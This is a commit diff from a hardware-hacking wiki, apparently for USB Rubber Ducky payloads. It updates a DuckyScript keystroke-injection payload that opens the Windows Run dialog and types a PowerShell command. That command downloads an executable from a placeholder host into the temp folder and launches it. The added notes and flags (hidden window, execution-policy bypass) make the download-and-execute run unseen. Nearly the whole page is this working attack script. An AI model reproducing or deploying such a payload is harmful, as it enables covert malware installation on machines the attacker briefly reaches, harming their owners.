Robot
/
wiki-rubber-ducky-usb
2
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

Updated Payload powershell wget execute (rdoc)

This commit is contained in:
Darren Kitchen 2016-11-07 14:07:38 -08:00
parent 20c17fb051
commit 072906e290
1 changed files with 3 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
Payload---powershell-wget---execute.rdoc
View File

@ -1,22 +1,16 @@
Powershell Wget + Execute
Author: mubix
Duckencoder: 1.2
Duckencoder: 1.3
Target: Windows 7
Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies.
GUI r
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','$env:temp\bob.exe'); Start-Process "$env:temp\bob.exe"
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/bob.txt',\"$env:temp\bob.exe\"); Start-Process \"$env:temp\bob.exe\""
ENTER
Adding two words to this makes it possible to hide the powershell window as it downloads and executes.
Note -windowstyle hidden hides the powershell window. Also mind the escaped quotes around $env:temp, otherwise the environment variable won't expand.
```
GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','$env:temp\bob.exe'); Start-Process "$env:temp\bob.exe"
ENTER
```
Edited by: Fahad Alkamli